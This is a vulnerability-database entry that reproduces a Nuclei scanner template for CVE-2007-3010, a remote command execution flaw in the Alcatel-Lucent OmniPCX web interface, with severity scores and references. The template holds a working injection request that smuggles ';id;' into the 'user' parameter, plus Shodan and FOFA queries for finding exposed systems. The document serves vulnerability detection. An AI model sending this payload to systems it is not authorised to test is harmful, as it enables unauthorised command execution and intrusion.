Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2007-3010
HistoryOct 13, 2023 - 4:05 p.m.

Alcatel-Lucent OmniPCX - Remote Command Execution

2023-10-1316:05:59
ProjectDiscovery
github.com
14
cve
rce
alcatel
web
interface
vulnerability
arbitrary
command
execution

6.7 Medium

AI Score

Confidence

Low

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.9%

The OmniPCX web interface has a script "masterCGI" with a remote command execution vulnerability via the "user" parameter.
id: CVE-2007-3010

info:
  name: Alcatel-Lucent OmniPCX - Remote Command Execution
  author: king-alexander
  severity: critical
  description: |
    The OmniPCX web interface has a script "masterCGI" with a remote command execution vulnerability via the "user" parameter.
  impact: |
    Any user with access to the web interface could execute arbitrary commands with the permissions of the webservers.
  remediation: |
    Update to supported versions that filter shell metacharacters in the "user" parameter.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2007-3010
    - https://marc.info/?l=full-disclosure&m=119002152126755&w=2
    - http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php
    - http://www.vupen.com/english/advisories/2007/3185
    - http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    cvss-score: 10
    cve-id: CVE-2007-3010
    cwe-id: CWE-20
    epss-score: 0.97317
    epss-percentile: 0.99868
    cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: alcatel-lucent
    product: omnipcx
    shodan-query: title:"OmniPCX for Enterprise"
    fofa-query: app="Alcatel_Lucent-OmniPCX-Enterprise"
  tags: cve,cve2007,kev,rce,alcatel

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: word
        part: body
        words:
          - "<TITLE>master</TITLE>"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100860fb5fb6459c546fd88f49a316826632cf5a5f32bc9e9a5ce27dce40d150997022100b0b9ecb0467a3de0631a06e2e867b73844a98e132eef931105650d75e196e26f:922c64590222798bb761d5b6d8e72950

6.7 Medium

AI Score

Confidence

Low

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.9%